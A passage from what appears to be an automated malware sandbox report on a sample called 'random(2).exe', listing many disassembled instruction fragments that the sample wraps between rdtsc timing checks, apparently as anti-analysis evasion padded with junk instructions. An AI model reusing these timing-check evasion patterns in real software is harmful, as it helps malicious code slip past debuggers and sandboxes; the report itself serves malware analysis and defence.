00007F8314EA9191h 0x0000004c mov dword ptr [esp], eax 0x0000004f call 00007F8314EA918Eh 0x00000054 pop edi 0x00000055 call dword ptr [ebp+122D31AAh] 0x0000005b jmp 00007F8314EA9191h 0x00000060 push ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 push ebx 0x00000064 pop ebx 0x00000065 jc 00007F8314EA9186h 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 819457 second address: 81945C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81945C second address: 819462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 819462 second address: 819466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 819714 second address: 819718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 819718 second address: 819728 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F83146B40C6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 819728 second address: 81972C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81972C second address: 819732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 819732 second address: 819738 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 819738 second address: 81973C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81DDAE second address: 81DDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81DDB2 second address: 81DDB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81DDB6 second address: 81DDD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8314EA9198h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81DDD8 second address: 81DE20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jmp 00007F83146B40D7h 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop ebx 0x00000012 jnl 00007F83146B40E4h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81E240 second address: 81E258 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9194h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81E647 second address: 81E65F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F83146B40D2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81E65F second address: 81E68A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9190h 0x00000007 push edx 0x00000008 jmp 00007F8314EA9190h 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81E68A second address: 81E690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81E690 second address: 81E694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81E931 second address: 81E93B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F83146B40C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81E93B second address: 81E93F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81E93F second address: 81E94A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81E94A second address: 81E951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81E951 second address: 81E964 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F83146B40CEh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jnl 00007F83146B40C6h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81E964 second address: 81E96C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81EAE5 second address: 81EAEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81EAEB second address: 81EAEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81EAEF second address: 81EAF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81EAF3 second address: 81EB0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F8314EA9186h 0x0000000d jl 00007F8314EA9186h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81EB0B second address: 81EB0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81F03C second address: 81F040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81F040 second address: 81F053 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81F053 second address: 81F079 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8314EA9188h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8314EA9194h 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81F079 second address: 81F083 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F83146B40C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81F083 second address: 81F0A3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8314EA9197h 0x00000008 jmp 00007F8314EA9191h 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8226F0 second address: 822703 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F83146B40CAh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82BFC9 second address: 82BFE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8314EA9191h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82B4F4 second address: 82B4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82AAC0 second address: 82AACA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8314EA9186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82AACA second address: 82AAD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82AAD2 second address: 82AAD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82AAD6 second address: 82AAE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82AAE3 second address: 82AAE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82EDC5 second address: 82EDC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82EDC9 second address: 82EDD3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8314EA9186h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82EDD3 second address: 82EDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F83146B40CEh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82EDE7 second address: 82EDF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F8314EA9186h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82E678 second address: 82E67C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82E67C second address: 82E6B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jmp 00007F8314EA9192h 0x0000000f jl 00007F8314EA9186h 0x00000015 pop ebx 0x00000016 jnc 00007F8314EA9192h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82E6B1 second address: 82E6C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CAh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82E823 second address: 82E83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8314EA9190h 0x00000009 jg 00007F8314EA9186h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8312F7 second address: 831312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F83146B40C6h 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c pushad 0x0000000d ja 00007F83146B40C8h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837090 second address: 837094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837094 second address: 83709E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F83146B40C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837229 second address: 83722D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83722D second address: 83724F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F83146B40CEh 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007F83146B40C6h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83724F second address: 837255 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837255 second address: 837269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F83146B40D2h 0x0000000c jno 00007F83146B40C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837269 second address: 837281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F8314EA9191h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837281 second address: 837290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F83146B40C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837290 second address: 837294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83739E second address: 8373C1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F83146B40C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F83146B40D9h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837672 second address: 83767E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007F8314EA9186h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83767E second address: 83768B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F83146B40C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83768B second address: 8376B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push edi 0x0000000e ja 00007F8314EA9186h 0x00000014 pop edi 0x00000015 jmp 00007F8314EA9191h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8376B5 second address: 8376B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8376B9 second address: 8376C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8376C5 second address: 8376CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7EE66F second address: 7EE673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7EE673 second address: 7EE679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7EE679 second address: 7EE67F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7EE67F second address: 7EE6A8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007F83146B40CBh 0x00000010 and dl, FFFFFF80h 0x00000013 pop edi 0x00000014 push 00000004h 0x00000016 mov dword ptr [ebp+122D1C14h], edx 0x0000001c push eax 0x0000001d push ecx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837A7C second address: 837A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F8314EA9198h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837A9C second address: 837AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837AA0 second address: 837AA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837AA4 second address: 837AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F83146B40D7h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83ADF6 second address: 83ADFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83ADFA second address: 83AE0C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F83146B40CCh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83E69A second address: 83E69E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83E69E second address: 83E6A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83E812 second address: 83E83B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8314EA9186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jp 00007F8314EA91A1h 0x00000012 jmp 00007F8314EA9195h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83E83B second address: 83E842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83E842 second address: 83E848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83E994 second address: 83E9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83146B40D5h 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83EB10 second address: 83EB1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8314EA918Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83EB1F second address: 83EB23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83EB23 second address: 83EB3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F8314EA9198h 0x00000010 push eax 0x00000011 jp 00007F8314EA9186h 0x00000017 pop eax 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 844F97 second address: 844F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 844F9F second address: 844FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 844FAA second address: 844FB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 844FB0 second address: 844FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 844FBF second address: 844FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F83146B40C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F83146B40CBh 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 844FD9 second address: 844FEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA918Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8454E6 second address: 845505 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F83146B40D5h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 845D28 second address: 845D64 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8314EA9186h 0x00000008 jc 00007F8314EA9186h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F8314EA9199h 0x00000019 push edi 0x0000001a pop edi 0x0000001b jmp 00007F8314EA918Ch 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 845D64 second address: 845D6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 845D6C second address: 845D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 849AE8 second address: 849AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 849AF1 second address: 849AFA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 849AFA second address: 849B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jo 00007F83146B40DFh 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
